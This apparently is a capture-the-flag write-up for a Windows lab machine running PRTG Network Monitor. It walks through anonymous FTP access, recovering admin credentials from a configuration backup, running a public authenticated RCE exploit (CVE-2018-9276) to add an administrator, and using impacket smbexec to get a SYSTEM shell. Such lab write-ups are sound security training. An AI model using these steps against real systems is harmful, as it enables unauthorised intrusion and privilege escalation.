# Recon
## NMAP
```txt
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-02-18T07:20:32
|_  start_date: 2022-02-18T07:13:55
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required


```
## Web
- Login page for PRTG Network Monitor.
- Default credentials fails.
- `PRTG Network Monitor 18.1.37.13946`
- An exploit exists for this but requires authentication.
## FTP
- Anonymous and directory listing allowed.
- We don't have write directory to `inetpub`
- It's a listing of full system we we can look around for the config file of PRTG.
- Found one in `/Program Files (x86)/PRTG Network Monitor`
- But nothing interesting was found there.
- Found another one in `/ProgramData/Paessler/PRTG Network Monitor` contains configuration files.
```sh
2-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak

```
- Reading `PRTG Configuration.old.bak` we found valid credentials
```xml
**            <dbpassword>
	      <!-- User: prtgadmin -->
	      PrTg@dmin2018
            </dbpassword>**
```
`prtgadmin:PrTg@dmin2018`
- We still can't login with the credentials, but trying with `2019` works!
- I'm guessing since it's an old configuration the password must have been updated with the year.
## SMB
- Access denied listing shares.

# Exploit
- We can login with our new credentials
`prtgadmin:PrTg@dmin2019`
- Searching for an exploit online we [have this](https://www.exploit-db.com/exploits/46527)
```
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

```
So it wants a cookie.
```sh
┌──(user㉿kali)-[~/ctf/netmon]
└─$ bash exploit -u http://10.10.10.152 -c "_ga=GA1.4.1074994285.1645169019; _gid=GA1.4.1802851148.1645169019; OCTOPUS1813713946=e0NBMkY4NjI5LUQyN0MtNEVCMi05RDkzLTY3REFDRTA4OUJCMH0%3D; _gat=1"

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! 
```
- Okay so `pentest` is now an admin user, let's see if we can list shares now on SMB
```txt
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

```
- Since we have access to these shares to write and read, we can use this to get a reverse shell. A tool from impacket `smbexec.py` can do this.
```sh
└─$ smbexec.py netmon.htb/pentest:P3nT3st\!@10.10.10.152                                                                                                                                                                                130 ⨯
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
nt authority\system

```